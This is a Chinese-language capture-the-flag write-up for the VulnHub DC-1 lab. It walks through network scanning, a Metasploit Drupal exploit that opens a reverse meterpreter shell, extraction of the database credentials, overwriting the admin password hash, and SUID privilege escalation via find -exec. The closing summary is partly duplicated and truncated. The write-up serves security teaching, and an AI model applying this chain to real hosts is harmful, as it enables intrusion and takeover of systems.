vulnhub-dc1靶场

DC1

配置环境vmware17 + nat网络配置

下载地址:DC and Five86 Series Challenges - DC-1

攻击机kali与其在同一网段下 ip:192.168.31.131

信息收集

arp-scan -l #内网探测,扫描目标ip

vulnhub-dc1靶场_第1张图片

发现目标ip192.168.31.135

使用nmap对目标进行扫描

nmap -T4 -sV -O -A -P 192.168.31.135

vulnhub-dc1靶场_第2张图片

发现开放端口80,22,111

先访问80的http服务

vulnhub-dc1靶场_第3张图片

发现了Drupal系统

漏洞利用

寻找历史漏洞

vulnhub-dc1靶场_第4张图片

使用msf查看有没有此漏洞的exp利用

msfconsole
search Drupal

vulnhub-dc1靶场_第5张图片

选择第二个,远程命令执行

use 1

vulnhub-dc1靶场_第6张图片

设置目标ip以及payload

set RHOST 192.168.31.135
set payload php/meterpreter/reverse_tcp #上图中默认的payload =>defaulting to php/meterpreter/reverse_tcp

开始利用

exploit

等待一下

vulnhub-dc1靶场_第7张图片

使用shell,然后利用python 创建交互式shell

shell
python -c 'import pty;pty.spawn("/bin/bash");'

vulnhub-dc1靶场_第8张图片

内网信息收集

查看信息

vulnhub-dc1靶场_第9张图片

vulnhub-dc1靶场_第10张图片

翻译过来,就是让你去找配置文件

这里采用find命令

find ./ -type f -name "*config*" -o -name "*setting*"#从此目录下递归查找文件名带有config或者setting的文件

vulnhub-dc1靶场_第11张图片

经查找在 ./sites/default/settings.php 有东西

cat ./sites/default/settings.php

vulnhub-dc1靶场_第12张图片

修改数据库密码

数据库账号密码

进入数据库

mysql -udbuser -pR0ck3t

查看数据

show databases;

vulnhub-dc1靶场_第13张图片

切换数据库

use drupaldb;

查看表

show tables;

vulnhub-dc1靶场_第14张图片

select * from users;

vulnhub-dc1靶场_第15张图片

在这里可以发现密码做了加密处理,所以必然有加密函数,可以通过加密一段密码替换原有的密码从而使用管理员身份登录

find ./ -type f -name "*password*"

vulnhub-dc1靶场_第16张图片

置换密码

update users set pass = "$S$DM/Wwb8I3NnMzCf4bGsGzoNV0tUQzvxJKTCN3E4mE2CQoODuQdtL" where uid = 1;

vulnhub-dc1靶场_第17张图片

登录网页

admin 123456

vulnhub-dc1靶场_第18张图片

vulnhub-dc1靶场_第19张图片

vulnhub-dc1靶场_第20张图片

翻译为,特殊的PERMS 将帮助查找passwd——但是您需要-exec 该命令来确定如何获取shadow中的内容。

权限提升

再使用find命令尝试提权

find / -perm -u=s -type f  #从根目录找具有root权限的文件

vulnhub-dc1靶场_第21张图片

发现find命令存在root权限,利用findml进行提权

find ./ 存在的文件名 -exec  "/bin/sh" \;

vulnhub-dc1靶场_第22张图片

成功提权

找flag

find / -type f -name "*flag*"

vulnhub-dc1靶场_第23张图片

总结

  1. nmap信息收集,wappalyzer插件找cms

    nmap -T4 -sV -O -A -P ip //T4速度 -sV查看服务 -O操作系统 -p端口 	     将所有主机视为在在线,跳过主机发现
    
  2. 漏洞利用Drupal

    msfconsole
    msf6>search Drupal
    msf6>use 1
    msf6>set RHOST 目标ip
    msf6>set payload 默认payload
    meterpreter>shell
    python -c 'import pty;pty.spawn("/bin/bash");' 使用python创建一个交互式shell
    
  3. find命令进行信息收集

  4. 数据库改密码

    update 表名 set 字段 = "修改的值" where 对应其他字段 = "当前存在的值"
    

ayload 默认payload
meterpreter>shell
python -c ‘import pty;pty.spawn(“/bin/bash”);’ 使用python创建一个交互式shell




3. find命令进行信息收集

4. 数据库改密码

```mysql
update 表名 set 字段 = "修改的值" where 对应其他字段 = "当前存在的值"
  1. 权限提升suid提权

你可能感兴趣的:(vulnhub,内网安全,web安全,安全)